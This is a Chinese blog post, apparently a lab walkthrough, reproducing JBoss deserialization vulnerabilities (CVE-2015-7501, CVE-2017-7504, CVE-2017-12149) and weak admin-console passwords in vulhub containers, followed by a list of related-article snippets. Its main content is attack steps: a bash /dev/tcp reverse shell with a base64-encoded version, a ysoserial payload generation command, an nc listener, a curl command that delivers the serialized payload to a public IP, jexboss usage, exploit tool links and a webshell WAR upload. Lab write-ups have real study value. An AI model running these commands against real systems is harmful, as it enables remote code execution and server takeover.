常见中间件漏洞:Jboss篇

最新推荐文章于 2025-04-02 21:23:34 发布
原创 最新推荐文章于 2025-04-02 21:23:34 发布 · 712 阅读 · 16 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#中间件 #jboss

部署运行你感兴趣的模型镜像

CVE-2015-7501

环境搭建

cd vulhub-master/jboss/JMXInvokerServlet-deserialization

docker-compose up -d

过程

访问网址,存在页面说明接口存在且存在反序列化漏洞

http://8.130.17.222:8080/invoker/JMXInvokerServlet

 

2.下载 ysoserial ⼯具进⾏漏洞利⽤

https://github.com/frohoff/ysoserial

将反弹shell进行base64编码

bash -i >& /dev/tcp/8.130.17.222/6666 0>&1

YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTMyLjkyLjE3LzY2NjYgMD4mMSA= 39java8 -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTMyLjkyLjE3LzY2NjYgMD4mMSA=}|{base64,-d}| {bash,-i} ">exp.ser

 3.监听端口

nc -lvvp 6666

4.执行命令

curl http://121.40.229.129:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

5.受到监听后反弹成功

CVE-2017-7504

漏洞介绍

41JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的 HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码执行

环境搭建

cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d

过程

访问网站

python3 jexboss.py -u http://8.130.17.222:8080
https://blog.youkuaiyun.com/weixin_44971640/article/details/128313851

CVE-2017-12149

漏洞介绍

该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter过 滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞

环境搭建

cd vulhub-master/jboss/CVE-2017-12149

docker-compose up -d

过程

访问网站

访问这个网站http://8.130.17.222:8080/invoker/readonly,出现500说明存在

3. 使用工具进行检测 DeserializeExploit 如果成功直接上传webshell即可:工具:
https://cdn.vulhub.org/deserialization/DeserializeExploit.jar
也可以直接执行命令: https://github.com/yunxu1/jboss-_CVE-2017-12149

Administration Console弱口令

漏洞描述

Administration Console管理页面存在弱口令,`admin:admin`,登陆后台上传war包 , getshell

环境搭建

cd vulhub-master/jboss/CVE-2017-12149

docker-compose up -d

密码文件

/jboss-6.1.0.Final/server/default/conf/props/jmx-console-users.properties

账户密码:admin:vulhub

过程

打开网站

http://8.130.17.222:8080/admin-console/login.seam

登录来到后台

点击web应用

上传后门shell压缩包

http://8.130.17.222:8080/shell/1.jsp链接即可

您可能感兴趣的与本文相关的镜像

GPT-oss:20b

GPT-oss:20b

图文对话
Gpt-oss

GPT OSS 是OpenAI 推出的重量级开放模型,面向强推理、智能体任务以及多样化开发场景

[ vulhub漏洞复现 ] Jboss_JMXInvokerServlet_Deserialization(反序列化)代码执行漏洞
qq_51577576的博客
09-15 1298
Jboss_JMXInvokerServlet_Deserialization代码执行漏洞漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞
【vulhub】JMXInvokerServlet-deserialization JBOOS 反序列化漏洞
weixin_42884199的博客
12-09 2447
前言 影响版本 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6.2.0 JBoss SOA Platform (SOA-P) 5.3.1 JBoss Data Grid (JDG) 6.5.0 JBoss BRMS (BRMS) 6.1.0 JBoss BPMS (BPMS) 6.1.0 JBoss Data V
Jboss反序列化漏洞的复现与原理
LJH1999ZN的博客
03-29 5555
一、什么是Jboss Jboss是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。 Jboss属于redhat公司,而且jboss是开源的,免费的,且在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器,所以曾经广为流行。 二、Jboss的历史漏洞 1.jboss反序列化漏洞,CVE-2017-7504 漏洞存在/jbossmq-httpi
Jboss JMXInvokerServlet-deserialization漏洞复现
云舒的博客
09-09 551
Jboss JMXInvokerServlet-deserialization漏洞复现
中间件漏洞 -- JBoss
weixin_44769042的博客
11-17 4697
中间件漏洞记录--5 jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。默认端口:8080,9990 目录 一、JBoss JMXInvokerServlet 反序列化漏洞 1、环境搭建:docker + vulh...
利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞
qq_50854662的博客
09-17 741
JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程漏洞原理 复现过程启动环境端口设置浏览器设置BurpSuit设置 复现漏洞序列化数据生成发送POCEXP Vulnhub官方复现教程 https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/ 漏洞原理 这是经典的JBoss反序列化漏洞JBoss在/invoker/JMXInvo..
JBoss EJBInvokerServlet CVE-2013-4810 反序列化漏洞
2301_81881972的博客
09-23 588
漏洞存在于JBoss中 /invoker/JMXInvokerServlet 路径。使⽤JavaDeserH2HC进⾏反弹shell。#监听 6666 端⼝。#创建class⽂件。
常见中间件漏洞之三:Jboss
gysadsadsa的博客
03-23 1085
JBoss是⼀个基于J2EE的开发源代码的应⽤服务器。JBoss代码遵循LGPL许可,可以在任何商业应⽤中免费使⽤。JBoss是⼀个管理EJB的容器和服务器,⽀持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核⼼服务不包括⽀持servlet/JSP的WEB容器,⼀般与Tomcat或Jetty绑定使⽤。在J2EE应⽤服务器领域,JBoss是发展最为迅速应⽤服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss⼴为流⾏。
常见中间件漏洞Jboss)靶场
2301_81525518的博客
09-22 675
访问http://192.168.10.194:8080/jbossmq-httpil/HTTPServerILServlet。invoker/JMXInvokerServlet 说明接⼝开放,此接⼝存在反序列化漏洞。因为使⽤环境不存在该漏洞所以需要输⼊账户密码:admin vulhub。找到⻚⾯中的void addURL() 选项远程加载war包来部署。制作war包 , 这⾥⽤之前制作好的 cmd.war。返回500,说明⻚⾯存在,此⻚⾯存在反序列化漏洞。搭建远程部署 , 部署远程war包地址。
常见中间件漏洞(三、Jboss合集)
2301_76631050的博客
08-06 1397
JBoss是一个基于J2EE的开发源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域JBoss是发展最为迅速应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发这使得JBoss广为流行。
常见中间件漏洞之三/四----Jboss/Apache】
最新发布
qq_65379983的博客
04-02 1239
JBoss和Apache常见漏洞
常见中间件漏洞总结PPT
01-25
中间件领域,常见的产品包括WebLogic、Tomcat、Nginx、IIS(Internet Information Services)、JBoss等。 1. WebLogic是Oracle公司的一个Java EE应用服务器,它支持企业级应用的部署和运行。WebLogic的漏洞往往...
jboss漏洞复现】CVE-2017-7504反序列化漏洞+CVE-2017-12149任意代码执行漏洞+JMXInvokerServlet-deserialization反序列化漏洞
serendipity1130的博客
08-31 1185
CVE-2017-7504 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 1.扫描开放了8080端口,访问8080端口: 2、利用工具选择一个Gadget:ExampleCommonsCollections1WithHashMap编译并生成序列化数据: javac -cp .:common
服务攻防——中间件Jboss
qq_55202378的博客
07-09 2492
JBoss是一个基于J2EE的开发源代码的应用服务器,一般与Tomcat或Jetty绑定使用。默认端口:8080、9990。
JBoss JMXInvokerServlet 反序列化漏洞复现(CVE-2015-7501)
wutiangui的博客
09-11 1028
JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。访问:8080/invoker/JMXInvokerServlet,返回如下页面(下载文件),说明接口开放,此接口存在反序列化漏洞。执行完该命令之后,会在本地桌面生成一个序列化的文件exp.ser,并利用cat查看其内容。然后,将生成的exp复制到JavaDeserH2HC-master目录方便下一步利用。
常见中间件漏洞jboss
l2772513700的博客
03-23 959
漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放,并且没有任何身份验证机制,导致攻击者可以进入到 jmx控制台,并在其中执行任何功能。JMX Console默认存在未授权访问,直接点击JBoss主页中的 JMX Console 链接进入JMX Console页面, 通过部署war包 , getshell。Administration Console管理页面存在弱口令,`admin:admin`,登陆后台上传war包 , getshell。
JBoss JMXInvokerServlet 反序列化漏洞复现
W小哥
05-26 2010
一、漏洞描述 影响范围 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6.2.0 JBoss SOA Platform (SOA-P) 5.3.1 JBoss Data Grid (JDG) 6.5.0 JBoss BRMS (BRMS) 6.1.0 JBoss BPMS (BPMS) 6.1.0 JBoss Da
【Vulhub】JBOSS JMXInvokerServlet 反序列化漏洞复现
看不尽的尘埃——博客
02-07 2503
环境 目标(Kali):http://192.168.0.11:8080/ 操作机(Paroot):192.168.0.131     过程 这个和前几个Jboss反序列化漏洞一样的利用方式。 只要把URL改成下面的即可: http://192.168.0.11:8080/invoker/JMXInvokerServlet            ...
JBoss JMXInvokerServlet 反序列化漏洞(CVE-2015-7501)
黑白的博客
12-21 2169
声明 好好学习,天天向上 漏洞描述 这是经典的JBoss反序列化漏洞JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。 影响范围 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6
中间件漏洞详解:Tomcat、Weblogic、Nginx、JBOSS安全总结
常见中间件漏洞总结PPT,涵盖了包括Tomcat、Weblogic、Nginx、IIS、Jboss在内的多种中间件常见安全漏洞和相关知识,适合培训和学习。” 在IT行业中,中间件扮演着至关重要的角色,它是一种介于操作系统和应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值